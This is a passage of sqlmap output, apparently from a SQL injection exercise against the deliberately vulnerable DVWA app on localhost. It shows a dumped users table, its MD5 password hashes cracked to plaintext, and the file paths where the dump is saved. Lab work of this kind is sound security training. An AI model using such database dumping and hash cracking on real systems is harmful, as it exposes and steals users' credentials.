[01:46:58] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[01:46:58] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[01:46:58] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[01:46:58] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password                                    |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| e99a18c428cb38d5f260853678922e03 (abc123)   |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+
[01:46:58] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
[01:46:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'